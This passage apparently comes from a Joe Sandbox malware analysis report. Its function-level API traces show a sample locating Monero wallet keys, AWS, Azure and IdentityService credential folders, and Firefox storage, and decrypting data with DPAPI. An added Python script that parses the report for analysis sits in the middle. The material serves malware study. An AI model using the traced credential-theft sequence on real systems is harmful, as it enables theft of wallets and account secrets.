                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0013CD36
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 0013CDB9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: 0d8abbafb7816288cb736c35c1892716b0e85e9ed0c23841f9c12e0dc5f688ef
                            • Instruction ID: 0fa3252deb94eb0cc56100f813b628b8c4f389c73023447dbe0344e6b830db85
                            • Opcode Fuzzy Hash: 0d8abbafb7816288cb736c35c1892716b0e85e9ed0c23841f9c12e0dc5f688ef
                            • Instruction Fuzzy Hash: 4E314471A40615AFDB10DB94CC91FE9B7B99B88B11F104194FA14EB2D0D7B1AE45CBD0
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00129BB3
                            • LocalFree.KERNEL32(?), ref: 00129BD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: ca1d3424711e47fcca8b9daf3efbba9a7fd8e260dbc6749ab051bf2e55ca030b
                            • Instruction ID: 056efac1513ada2628908b5106fedea7637b2079fc547f7f103c99200b2c8060
                            • Opcode Fuzzy Hash: ca1d3424711e47fcca8b9daf3efbba9a7fd8e260dbc6749ab051bf2e55ca030b
                            • Instruction Fuzzy Hash: 09011DB5E41319ABE7109BA8DC45FAFB77CEB48B01F104555EA04AB280D7B49A10CBE1
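The three CRYPT32 functions listed above share one idiom worth recognising when reading a report like this: CryptBinaryToStringA and CryptStringToBinaryA are each called twice with the same dwFlags, with a heap or local allocation in between (size query, allocate, convert), and CryptUnprotectData is called with pOptionalEntropy and dwFlags both NULL, so the blob is decryptable by any process running as the same user. The script below is an added example written for this page, not Joe Sandbox or sample code: it parses the report's "Name.DLL(args), ref: addr" API lines, decodes the CRYPT_STRING_* and LocalAlloc flag values (documented wincrypt.h and winbase.h constants), and reports those patterns. The sample input is constructed from the three entries above.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox report and flag the
CryptoAPI/DPAPI idioms they reveal.

Added example for this page, not Joe Sandbox or Stealc code.  Assumed: the
input uses the "Name.DLL(args), ref: addr" line shape shown in the report;
the constants are the documented wincrypt.h / winbase.h values.
"""
import re
from dataclasses import dataclass

CRYPT_STRING_NOCRLF = 0x40000000                       # wincrypt.h
CRYPT_STRING_FORMATS = {0x0: "BASE64HEADER", 0x1: "BASE64", 0x2: "BINARY",
                        0x4: "HEX", 0xC: "HEXRAW"}      # low byte of dwFlags
LOCAL_FLAGS = {0x0000: "LMEM_FIXED", 0x0040: "LPTR", 0x0042: "LHND"}  # winbase.h
ALLOCATORS = {"LocalAlloc", "GlobalAlloc", "HeapAlloc", "RtlAllocateHeap", "VirtualAlloc"}

# One report line, e.g.  "• LocalAlloc.KERNEL32(00000040,00000000), ref: 00129B4A"
# Lines without an argument list ("• LocalFree.KERNEL32 ref: 00129B70") also match.
_LINE = re.compile(r"^\s*•?\s*(?P<api>\w+)\.(?P<dll>\w+)"
                   r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    api: str
    dll: str
    args: list      # int per argument, None where the report prints '?'
    ref: int        # address of the call site


def parse_api_lines(text: str) -> list:
    """Turn the report's API bullet lines into ApiCall records; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a.strip(), 16)
                for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("dll"), args, int(m.group("ref"), 16)))
    return calls


def crypt_string_flags(flags) -> str:
    """Render a CRYPT_STRING_* dwFlags value, e.g. 0x40000001 -> 'BASE64|NOCRLF'."""
    if flags is None:
        return "?"
    fmt = CRYPT_STRING_FORMATS.get(flags & 0xFF, f"fmt=0x{flags & 0xFF:x}")
    return fmt + ("|NOCRLF" if flags & CRYPT_STRING_NOCRLF else "")


def find_patterns(calls: list) -> list:
    """Return human-readable findings for the idioms the report's call lists expose."""
    findings = []
    for i, c in enumerate(calls):
        if c.api in ("CryptStringToBinaryA", "CryptBinaryToStringA") and len(c.args) > 2:
            # Size-query-then-convert: the same API twice with the same dwFlags and an
            # allocation in between.  (The report prints static argument guesses, so the
            # NULL output pointer of the first call is not a reliable discriminator.)
            for j in range(i + 1, len(calls)):
                if calls[j].api == c.api and calls[j].args[2:3] == c.args[2:3]:
                    allocs = [x.api for x in calls[i + 1:j] if x.api in ALLOCATORS]
                    if allocs:
                        verb = "decode" if c.api == "CryptStringToBinaryA" else "encode"
                        findings.append(f"{verb} at {c.ref:08X}/{calls[j].ref:08X} "
                                        f"flags={crypt_string_flags(c.args[2])} via {allocs[0]}")
                    break
        elif c.api == "LocalAlloc" and c.args and c.args[0] is not None:
            findings.append(f"LocalAlloc at {c.ref:08X} "
                            f"uFlags={LOCAL_FLAGS.get(c.args[0], hex(c.args[0]))}")
        elif c.api == "CryptUnprotectData" and len(c.args) >= 7:
            # Arguments: pDataIn, ppszDataDescr, pOptionalEntropy, pvReserved,
            # pPromptStruct, dwFlags, pDataOut.  NULL entropy means any process running
            # as the same user can decrypt the blob (plain DPAPI user scope).
            entropy = "no optional entropy" if c.args[2] == 0 else "with optional entropy"
            findings.append(f"DPAPI CryptUnprotectData at {c.ref:08X}, {entropy}, "
                            f"dwFlags={c.args[5]}")
    return findings


# Constructed input: the API lines of the three CRYPT32 entries in this report.
SAMPLE = """
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 001442DD
• GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 001442EC
• RtlAllocateHeap.NTDLL(00000000), ref: 001442F3
• CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00144323
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00129B3B
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00129B4A
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00129B61
• LocalFree.KERNEL32 ref: 00129B70
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B9F
• LocalAlloc.KERNEL32(00000040,?), ref: 00129BB3
• LocalFree.KERNEL32(?), ref: 00129BD7
"""

if __name__ == "__main__":
    for finding in find_patterns(parse_api_lines(SAMPLE)):
        print(finding)
```

Run against the sample, it reports a base64 encode (BASE64|NOCRLF, buffer from RtlAllocateHeap), a base64 decode (BASE64, buffer from LocalAlloc with LPTR, i.e. fixed and zero-initialised), and a DPAPI decrypt with no optional entropy; the same parser can be pointed at any other entry's API list in the report.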
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: LU/$dr?{
                            • API String ID: 0-4254118748
                            • Opcode ID: 0c2ebfb021ab239ab62bff69b21781c88c09b47140d987bb1df60f9d6fd2c40b
                            • Instruction ID: 2e784ba64990d86e97d262b17f0540ca767bed9b283ee5017fab8dd90bb0f5f1
                            • Opcode Fuzzy Hash: 0c2ebfb021ab239ab62bff69b21781c88c09b47140d987bb1df60f9d6fd2c40b
                            • Instruction Fuzzy Hash: CDB207F3A0C210AFE3046E2DEC8567ABBE9EFD4720F1A453DE6C4C7744EA3558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .?
                            • API String ID: 0-2522436520
                            • Opcode ID: 69daacdc8ce96dea9d6c4e5053325d87228643eadd9526029290d236abff8dec
                            • Instruction ID: 55f69025ca13ec034869d50006e3e763bd2ae323ea351d974da985af83330f3d
                            • Opcode Fuzzy Hash: 69daacdc8ce96dea9d6c4e5053325d87228643eadd9526029290d236abff8dec
                            • Instruction Fuzzy Hash: AC5206F3A0C200AFE7056E2DDC457BABBE9EF94320F1A492DE6C4C7744E63598058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: F\{_
                            • API String ID: 0-3447907185
                            • Opcode ID: f28cfb7bd64d7f91936a9b15198ff5ca30be0761a055c608686b9594f00f14ca
                            • Instruction ID: b1c945b0779fcba2703a33032ddba467a8f5a54c49cf3ac1e254f90ed0913b61
                            • Opcode Fuzzy Hash: f28cfb7bd64d7f91936a9b15198ff5ca30be0761a055c608686b9594f00f14ca
                            • Instruction Fuzzy Hash: 0671F8F3A086049FE314BE29DC8577AF7E5EF94310F1A853DDAC483744F97559018686
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: e]y
                            • API String ID: 0-299156766
                            • Opcode ID: 1e153639b347cbfa108de0a5150fecce77c4c6a4fe02330a77560faee8c8b53f
                            • Instruction ID: 01fbf889e27622c8fe4ee1514edd9afa68dd83fc1948c14e102d00314656b2fc
                            • Opcode Fuzzy Hash: 1e153639b347cbfa108de0a5150fecce77c4c6a4fe02330a77560faee8c8b53f
                            • Instruction Fuzzy Hash: 856116F3A083085FF3106E29EDC977ABBD9EB94314F1A853DEBC483744E93558098646
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: T1C@
                            • API String ID: 0-3976893720
                            • Opcode ID: 373b2b20d8775a3c2116cf57879c4743939f296d1cb635f7b26e82ab4621ce71
                            • Instruction ID: be1addab9a23b5d4b545c63f36da01ba87c6c7a3143a611f2dc2710f1e13da42
                            • Opcode Fuzzy Hash: 373b2b20d8775a3c2116cf57879c4743939f296d1cb635f7b26e82ab4621ce71
                            • Instruction Fuzzy Hash: 064179E321C34DDFD30C5D2AECC863B7F85E788390F354A3EE6C28A744E62594459616
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00138776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001387AD
                            • lstrcpy.KERNEL32(?,00000000), ref: 001387EA
                            • StrStrA.SHLWAPI(?,013FE040), ref: 0013880F
                            • lstrcpyn.KERNEL32(003593D0,?,00000000), ref: 0013882E
                            • lstrlen.KERNEL32(?), ref: 00138841
                            • wsprintfA.USER32 ref: 00138851
                            • lstrcpy.KERNEL32(?,?), ref: 00138867
                            • StrStrA.SHLWAPI(?,013FE520), ref: 00138894
                            • lstrcpy.KERNEL32(?,003593D0), ref: 001388F4
                            • StrStrA.SHLWAPI(?,013FE328), ref: 00138921
                            • lstrcpyn.KERNEL32(003593D0,?,00000000), ref: 00138940
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121F9F
                            • lstrlen.KERNEL32(013F8FF8), ref: 00121FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00121FE3
                            • lstrlen.KERNEL32(0015179C), ref: 00121FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012200E
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 0012201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00122042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012204D
                            • lstrlen.KERNEL32(0015179C), ref: 00122058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122075
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00122081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001220AC
                            • lstrlen.KERNEL32(?), ref: 001220E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122104
                            • lstrcat.KERNEL32(00000000,?), ref: 00122112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122139
                            • lstrlen.KERNEL32(0015179C), ref: 0012214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012216B
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00122177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001221A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001221D4
                            • lstrlen.KERNEL32(?), ref: 001221EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012220A
                            • lstrcat.KERNEL32(00000000,?), ref: 00122218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122242
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012227F
                            • lstrlen.KERNEL32(013FD448), ref: 0012228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001222B1
                            • lstrcat.KERNEL32(00000000,013FD448), ref: 001222B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001222F7
                            • lstrcat.KERNEL32(00000000), ref: 00122304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00122356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001223BF
                            • DeleteFileA.KERNEL32(00000000), ref: 001223F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00122444
                            • FindClose.KERNEL32(00000000), ref: 00122453
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001365A5
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001365E0
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013660A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136641
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013666E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134503
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134536
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013455E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134569
                            • lstrlen.KERNEL32(\storage\default\), ref: 00134574
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134591
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0013459D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001345C6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001345D1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001345F8
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134637
                            • lstrcat.KERNEL32(00000000,?), ref: 0013463F
                            • lstrlen.KERNEL32(0015179C), ref: 0013464A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134667
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00134673
                            • lstrlen.KERNEL32(.metadata-v2), ref: 0013467E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013469B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 001346A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001346CE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134700
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00134707
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134761
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013478A
                            • lstrcpy.KERNEL32(00000000,?), ref: 001347B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 001347DB
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013480F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00135935
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00135964
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135995
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001359BD
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001359C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001359F0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135A28
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00135A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135A58
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00135A8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135AB6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00135AC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135AE8
                            • lstrlen.KERNEL32(0015179C), ref: 00135AFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135B19
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00135B25
                            • lstrlen.KERNEL32(013FD328), ref: 00135B34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135B57
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00135B62
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135B8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135BB8
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00135BBF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135C17
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135C8D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135CB6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135CE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135D15
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00135D4F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135DAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135DD0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            APIs
                              • Part of subcall function 00121120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00121135
                              • Part of subcall function 00121120: RtlAllocateHeap.NTDLL(00000000), ref: 0012113C
                              • Part of subcall function 00121120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00121159
                              • Part of subcall function 00121120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00121173
                              • Part of subcall function 00121120: RegCloseKey.ADVAPI32(?), ref: 0012117D
                            • lstrcat.KERNEL32(?,00000000), ref: 001211C0
                            • lstrlen.KERNEL32(?), ref: 001211CD
                            • lstrcat.KERNEL32(?,.keys), ref: 001211E8
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012121F
                            • lstrlen.KERNEL32(013F8FF8), ref: 0012122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121251
                            • lstrcat.KERNEL32(00000000,013F8FF8), ref: 00121259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00121264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00121294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001212BA
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001212FF
                            • lstrlen.KERNEL32(013FD448), ref: 0012130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121335
                            • lstrcat.KERNEL32(00000000,?), ref: 0012133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121378
                            • lstrcat.KERNEL32(00000000), ref: 00121385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001213AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 001213D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121401
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012143D
                              • Part of subcall function 0013EFC0: lstrcpy.KERNEL32(00000000,?), ref: 0013EFF2
                            • DeleteFileA.KERNEL32(?), ref: 00121471
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: f1d63e6e69607b085cc84ca4ecc894528ec5918d07e9159dd49f987549b25a9f
                            • Instruction ID: 8f49b7b65ca1504aecfeb4247e2f015dc99630ef5218fbac6f18abd7d785785b
                            • Opcode Fuzzy Hash: f1d63e6e69607b085cc84ca4ecc894528ec5918d07e9159dd49f987549b25a9f
                            • Instruction Fuzzy Hash: D5A1B231A01236BBCB22EF74FC8AA9E77B9AF68311F040124F905E7651DB34DE558B90
                            APIs
                            • memset.MSVCRT ref: 0013E920
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0013E949
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E97F
                            • lstrcat.KERNEL32(?,00000000), ref: 0013E98D
                            • lstrcat.KERNEL32(?,\.azure\), ref: 0013E9A6
                            • memset.MSVCRT ref: 0013E9E5
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0013EA0D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013EA3F
                            • lstrcat.KERNEL32(?,00000000), ref: 0013EA4D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 0013EA66
                            • memset.MSVCRT ref: 0013EAA5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0013EAD1
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013EB00
                            • lstrcat.KERNEL32(?,00000000), ref: 0013EB0E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0013EB27
                            • memset.MSVCRT ref: 0013EB66
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same 16 associated memory dumps as listed under the previous function's Memory Dump Source
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
